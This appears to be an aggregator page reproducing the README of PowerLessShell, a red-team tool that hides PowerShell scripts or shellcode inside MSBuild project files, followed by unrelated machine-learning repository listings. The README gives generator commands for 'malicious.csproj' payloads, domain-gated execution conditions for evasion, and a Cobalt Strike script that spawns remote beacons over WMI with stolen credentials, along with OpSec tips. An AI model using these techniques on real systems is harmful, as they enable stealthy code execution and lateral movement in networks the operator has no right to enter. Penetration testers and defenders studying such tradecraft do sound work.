Run PowerShell command without invoking powershell.exe

Related tags

Deep LearningPowerLessShell
Overview

PowerLessShell

PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.

MSBuild conditions

MSBuild support condition that can be used to avoid running code if the condition is not met.

<Target Name="x" Condition="'$(USERDOMAIN)'=='RingZer0'">

The malicious code will only be executed if the current user domain is "RingZer0"

Condition supports several other formats that can be used to create more conditional execution check.

<Target Name="x" Condition="'$(registry:HKEY_LOCAL_MACHINE\[email protected])'>='0'">

Property Functions also expose interesting data.

https://docs.microsoft.com/en-us/visualstudio/msbuild/property-functions

Usage

PowerLessShell use commandline argument to generate the final file.

$ python PowerLessShell.py -h
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
usage: PowerLessShell.py [-h] [-type TYPE] -source SOURCE -output OUTPUT
                         [-arch ARCH] [-condition CONDITION]

optional arguments:
  -h, --help            show this help message and exit
  -type TYPE            Payload type (shellcode/powershell) default to:
                        shellcode
  -source SOURCE        Path to the source file (raw shellcode or powershell
                        script)
  -output OUTPUT        MSBuild output filename
  -arch ARCH            Shellcode architecture (32/64) default to: 32
  -condition CONDITION  XML Compiling condition default (Check for USERDOMAIN)
                        default is: none

Generating a powershell payload

$ python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-powershell.csproj as the template
File 'malicious.csproj' created
Process completed

Generating a shellcode payload

$ python PowerLessShell.py -source shellcode.raw -output malicious.csproj
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
File 'malicious.csproj' created
Process completed

Generating a 64 bits shellcode payload

$ python PowerLessShell.py -source shellcode64.raw -output malicious.csproj -arch 64
PowerLessShell Less is More
Mr.Un1k0d3r RingZer0 Team
-----------------------------------------------------------
Generating the msbuild file using include/template-shellcode.csproj as the template
Generating a payload for a 64 bits shellcode! Don't forget to use the 64 bits version of msbuild.exe
File 'malicious.csproj' created
Process completed

Cobalt Strike Aggressor script (wmi_msbuild.cna)

By Alyssa (ramen0x3f) and MrT-F

Set Up

  • Either copy PowerLessShell folder to [cobalts working dir]/PowerLessShell or make note of path
  • If you didn't copy it to the Cobalt directory: edit the $pls_path variable in this file to point to PowerLessShell
  • Load script into Cobalt Strike

Usage

check_msbuild -target TARGET   		Verify .NET 4.0.30319 is installed (should see "Status OK")
	[-user user] [-pass pass]		Windows 7 has .NET 4.0.30319 after 3 reboots and 4 Windows update cycles

rename_msbuild -target TARGET 		Copy MSBuild.exe. 
	-msbuild newname 
 	[-path C:\new\path] 		Default - C:\Users\Public\
	[-user domain\username]		Specifying user/pass spawns cmd on remote host.
 	[-pass password]			

wmi_msbuild -target TARGET 		 	Spawn new beacon. 
         -listener LISTENER
	[-payload new_file]		 	Default - [a-zA-Z].tmp
	[-directory new_dir]			Default - C:\Users\Public\
	[-msbuild alt_msbuild_location] 	
	[-user USERNAME] [-pass PASSWORD]	
	[-manualdelete]				Switch doesn't auto delete payload.

OpSec Notes

Spawns cmd.exe on the target system if

  • ManualDelete switch is not set
  • rename_msbuild is run with a username/password specified

Credit

Mr.Un1k0d3r RingZer0 Team 2017

Owner
Mr.Un1k0d3r
Mostly Red Team tools for penetration testing. My patreon https://patreon.com/MrUn1k0d3r
Mr.Un1k0d3r
GitHub Repository
PyTorch implementation of the REMIND method from our ECCV-2020 paper "REMIND Your Neural Network to Prevent Catastrophic Forgetting"

REMIND Your Neural Network to Prevent Catastrophic Forgetting This is a PyTorch implementation of the REMIND algorithm from our ECCV-2020 paper. An ar

Tyler Hayes 72 Nov 27, 2022
PyTorch framework, for reproducing experiments from the paper Implicit Regularization in Hierarchical Tensor Factorization and Deep Convolutional Neural Networks

Implicit Regularization in Hierarchical Tensor Factorization and Deep Convolutional Neural Networks. Code, based on the PyTorch framework, for reprodu

Asaf 3 Dec 27, 2022
Semi-Supervised Signed Clustering Graph Neural Network (and Implementation of Some Spectral Methods)

SSSNET SSSNET: Semi-Supervised Signed Network Clustering For details, please read our paper. Environment Setup Overview The project has been tested on

Yixuan He 9 Nov 24, 2022
BigbrotherBENL - Face recognition on the Big Brother episodes in Belgium and the Netherlands.

BigbrotherBENL - Face recognition on the Big Brother episodes in Belgium and the Netherlands. Keeping statistics of whom are most visible and recognisable in the series and wether or not it has an im

Frederik 2 Jan 04, 2022
[NeurIPS 2021] Galerkin Transformer: a linear attention without softmax

[NeurIPS 2021] Galerkin Transformer: linear attention without softmax Summary A non-numerical analyst oriented explanation on Toward Data Science abou

Shuhao Cao 159 Dec 20, 2022
A collection of awesome resources image-to-image translation.

awesome image-to-image translation A collection of resources on image-to-image translation. Contributing If you think I have missed out on something (

876 Dec 28, 2022
Numerai tournament example scripts using NN and optuna

numerai_NN_example Numerai tournament example scripts using pytorch NN, lightGBM and optuna https://numer.ai/tournament Performance of my model based

Takahiro Maeda 12 Oct 10, 2022
SwinTrack: A Simple and Strong Baseline for Transformer Tracking

SwinTrack This is the official repo for SwinTrack. A Simple and Strong Baseline Prerequisites Environment conda (recommended) conda create -y -n SwinT

LitingLin 196 Jan 04, 2023
This is a pytorch implementation for the BST model from Alibaba https://arxiv.org/pdf/1905.06874.pdf

Behavior-Sequence-Transformer-Pytorch This is a pytorch implementation for the BST model from Alibaba https://arxiv.org/pdf/1905.06874.pdf This model

Jaime Ferrando Huertas 83 Jan 05, 2023
Contextualized Perturbation for Textual Adversarial Attack, NAACL 2021

Contextualized Perturbation for Textual Adversarial Attack Introduction This is a PyTorch implementation of Contextualized Perturbation for Textual Ad

cookielee77 30 Jan 01, 2023
Dados coletados e programas desenvolvidos no processo de iniciação científica

Iniciacao_cientifica_FAPESP_2020-14845-6 Dados coletados e programas desenvolvidos no processo de iniciação científica Os arquivos .py são os programa

1 Jan 10, 2022
PFLD pytorch Implementation

PFLD-pytorch Implementation of PFLD A Practical Facial Landmark Detector by pytorch. 1. install requirements pip3 install -r requirements.txt 2. Datas

zhaozhichao 669 Jan 02, 2023
Python script for Linear, Non-Linear Convection, Burger’s & Poisson Equation in 1D & 2D, 1D Diffusion Equation using Standard Wall Function, 2D Heat Conduction Convection equation with Dirichlet & Neumann BC, full Navier-Stokes Equation coupled with Poisson equation for Cavity and Channel flow in 2D using Finite Difference Method & Finite Volume Method.

Navier-Stokes-numerical-solution-using-Python- Python script for Linear, Non-Linear Convection, Burger’s & Poisson Equation in 1D & 2D, 1D D

89 Jan 04, 2023
A programming language written with python

Kaoft A programming language written with python How to use A simple Hello World: c="Hello World" c Output: "Hello World" Operators: a=12

1 Jan 24, 2022
PyTorch implementation of Off-policy Learning in Two-stage Recommender Systems

Off-Policy-2-Stage This repo provides a PyTorch implementation of the MovieLens experiments for the following paper: Off-policy Learning in Two-stage

Jiaqi Ma 25 Dec 12, 2022
deep-table implements various state-of-the-art deep learning and self-supervised learning algorithms for tabular data using PyTorch.

deep-table implements various state-of-the-art deep learning and self-supervised learning algorithms for tabular data using PyTorch.

63 Oct 17, 2022
Pytorch implementation of MixNMatch

MixNMatch: Multifactor Disentanglement and Encoding for Conditional Image Generation [Paper] Yuheng Li, Krishna Kumar Singh, Utkarsh Ojha, Yong Jae Le

910 Dec 30, 2022
A script written in Python that returns a consensus string and profile matrix of a given DNA string(s) in FASTA format.

A script written in Python that returns a consensus string and profile matrix of a given DNA string(s) in FASTA format.

Zain 1 Feb 01, 2022
An example of Scatterbrain implementation (combining local attention and Performer)

An example of Scatterbrain implementation (combining local attention and Performer)

HazyResearch 97 Jan 02, 2023
MarcoPolo is a clustering-free approach to the exploration of bimodally expressed genes along with group information in single-cell RNA-seq data

MarcoPolo is a method to discover differentially expressed genes in single-cell RNA-seq data without depending on prior clustering Overview MarcoPolo

Chanwoo Kim 13 Dec 18, 2022